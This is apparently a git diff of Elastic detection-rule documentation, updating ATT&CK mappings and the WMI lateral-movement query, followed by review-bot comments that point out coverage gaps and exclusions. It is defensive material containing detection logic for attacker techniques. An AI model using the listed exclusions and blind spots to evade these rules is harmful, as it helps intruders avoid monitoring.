@@ -30,11 +30,12 @@ Identifies a PowerShell process launched by either cscript.exe or wscript.exe. O * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -123,3 +124,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Spearphishing Attachment ** ID: T1566.001 ** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-script-interpreter-executing-process-via-wmi.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-script-interpreter-executing-process-via-wmi.asciidoc index 2db2abfc26..473d3cb9ce 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-script-interpreter-executing-process-via-wmi.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-script-interpreter-executing-process-via-wmi.asciidoc @@ -34,7 +34,7 @@ Identifies use of the built-in Windows script interpreters (cscript.exe or wscri * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -99,6 +99,14 @@ sequence by host.id with maxspan = 5s ** ID: TA0002 ** Reference URL: https://attack.mitre.org/tactics/TA0002/ * Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: ** Name: Windows Management Instrumentation ** ID: T1047 ** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/wmi-incoming-lateral-movement.asciidoc b/docs/detections/prebuilt-rules/rule-details/wmi-incoming-lateral-movement.asciidoc index f7990a92c2..da1d9ca28a 100644 --- a/docs/detections/prebuilt-rules/rule-details/wmi-incoming-lateral-movement.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/wmi-incoming-lateral-movement.asciidoc @@ -31,7 +31,7 @@ Identifies processes executed via Windows Management Instrumentation (WMI) on a * Tactic: Lateral Movement * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -55,13 +55,16 @@ sequence by host.id with maxspan = 2s /* Excluding Common FPs Nessus and SCCM */ - [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WmiPrvSE.exe" and - not process.args : ("C:\\windows\\temp\\nessus_*.txt", - "*C:\\windows\\TEMP\\nessus_*.TMP*", - "*C:\\Windows\\CCM\\SystemTemp\\*", - "C:\\Windows\\CCM\\ccmrepair.exe", - "C:\\Windows\\CCMCache\\*", - "C:\\CCM\\Cache\\*") + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WmiPrvSE.exe" and + not process.Ext.token.integrity_level_name : "system" and not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + not process.executable : + ("?:\\Program Files\\HPWBEM\\Tools\\hpsum_swdiscovery.exe", + "?:\\Windows\\CCM\\Ccm32BitLauncher.exe", + "?:\\Windows\\System32\\wbem\\mofcomp.exe", + "?:\\Windows\\Microsoft.NET\\Framework*\\csc.exe", + "?:\\Windows\\System32\\powercfg.exe") and + not (process.executable : "?:\\Windows\\System32\\msiexec.exe" and process.args : "REBOOT=ReallySuppress") and + not (process.executable : "?:\\Windows\\System32\\inetsrv\\appcmd.exe" and process.args : "uninstall") ] ---------------------------------- @@ -72,6 +75,10 @@ sequence by host.id with maxspan = 2s ** Name: Lateral Movement ** ID: TA0008 ** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ * Tactic: ** Name: Execution ** ID: TA0002 diff --git a/docs/detections/prebuilt-rules/rule-details/wmic-remote-command.asciidoc b/docs/detections/prebuilt-rules/rule-details/wmic-remote-command.asciidoc index 9034c97058..d9957a46a8 100644 --- a/docs/detections/prebuilt-rules/rule-details/wmic-remote-command.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/wmic-remote-command.asciidoc 
@@ -30,7 +30,7 @@ Identifies the use of wmic.exe to run commands on remote hosts. While this can b * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -61,6 +61,10 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Windows Remote Management +** ID: T1021.006 +** Reference URL: https://attack.mitre.org/techniques/T1021/006/ * Tactic: ** Name: Execution ** ID: TA0002 diff --git a/docs/detections/prebuilt-rules/rule-details/writedac-access-on-active-directory-object.asciidoc b/docs/detections/prebuilt-rules/rule-details/writedac-access-on-active-directory-object.asciidoc index a952254a73..bed2b3c50f 100644 --- a/docs/detections/prebuilt-rules/rule-details/writedac-access-on-active-directory-object.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/writedac-access-on-active-directory-object.asciidoc @@ -35,7 +35,7 @@ Identifies the access on an object with WRITEDAC permissions. With the WRITEDAC * Use Case: Active Directory Monitoring * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -64,3 +64,7 @@ event.action:"Directory Service Access" and event.code:"5136" and ** Name: File and Directory Permissions Modification ** ID: T1222 ** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Sub-technique: +** Name: Windows File and Directory Permissions Modification +** ID: T1222.001 +** Reference URL: https://attack.mitre.org/techniques/T1222/001/ diff --git a/docs/index.asciidoc b/docs/index.asciidoc index 8045ca2530..5a36834b09 100644 --- a/docs/index.asciidoc +++ b/docs/index.asciidoc 
@@ -91,3 +91,5 @@ include::detections/prebuilt-rules/downloadable-packages/8-10-2/prebuilt-rules-8 include::detections/prebuilt-rules/downloadable-packages/8-10-3/prebuilt-rules-8-10-3-appendix.asciidoc[] include::detections/prebuilt-rules/downloadable-packages/8-10-4/prebuilt-rules-8-10-4-appendix.asciidoc[] + +include::detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc[]
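Review bot: In the new unusual-process-writing-data-to-an-external-device.asciidoc, the "==== Investigation guide" heading is followed by an empty `[source, markdown]` block, so the page renders a heading with nothing under it; either fill in the guide text or drop the heading and block until there is content. The tag list in the same file also carries both "Rule Type: ML" and "Rule Type: Machine Learning", which looks like a duplicate; keep whichever tag the other ML rule pages in this set use.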
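Review bot: The new exclusion in unusual-user-privilege-enumeration-via-id.asciidoc, `not (process.parent.name == "rpm" or process.parent.args : "/var/tmp/rpm-tmp*")`, keys only on the parent's name and argument text, which are weaker anchors than the parent's executable path; if the intent is to whitelist rpm scriptlets, consider constraining on `process.parent.executable` as well so the exclusion stays no broader than that case. The rule description above the hunk still reads as a plain "sequence of 20 'id' command executions within 1 second" and does not mention the rpm exclusion; a sentence in the description or false-positives section noting that package-manager scriptlets are excluded would keep the docs in step with the query.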
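Review bot: The query in the new windows-installer-with-suspicious-properties.asciidoc opens with `sequence with maxspan=1m` and no `by` join key, so the registry event from one msiexec.exe and the child-process event from any other msiexec.exe within a minute, on any host in the index, can be joined into one match. The other sequence rules touched in this patch use `sequence by host.id ...`; at minimum add `by host.id`, and consider joining the registry event's process.entity_id to the second event's process.parent.entity_id so the child is tied to the msiexec.exe instance that wrote the InstallSource/ProductName value. Separately, "application whitelisting" in the description could read "application control" to match current Microsoft terminology.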
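Review bot: In the wmi-incoming-lateral-movement.asciidoc query hunk, the retained comment `/* Excluding Common FPs Nessus and SCCM */` is now stale: the nessus_* and CCM path exclusions are removed and replaced by `not process.Ext.token.integrity_level_name : "system" and not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20")` plus a fixed executable list, so the comment should describe the new exclusions. That integrity-level/SID exclusion also drops every child of WmiPrvSE.exe running at system integrity or as LocalSystem/LocalService/NetworkService from coverage, and the `Framework*\\csc.exe` entry excludes a compiler launched from the WMI provider host; both are coverage changes worth stating in the rule's description or false-positives section rather than leaving implicit in the query.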
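Review bot: The sub-technique added to wmic-remote-command.asciidoc, "Windows Remote Management / T1021.006", may not be the intended mapping for a rule that identifies wmic.exe running commands on remote hosts: wmic.exe reaches remote hosts over DCOM/RPC-based WMI rather than the WinRM service, and the closer technique is Windows Management Instrumentation (T1047). Please confirm the mapping before it lands, or note in the description why T1021.006 was chosen.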
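Review bot: In docs/index.asciidoc the new include for prebuilt-rules-8-10-5-appendix.asciidoc is preceded by an added blank line, while the surrounding 8-10-3 and 8-10-4 includes are contiguous; drop the blank line so the appendix list keeps its one-include-per-line layout.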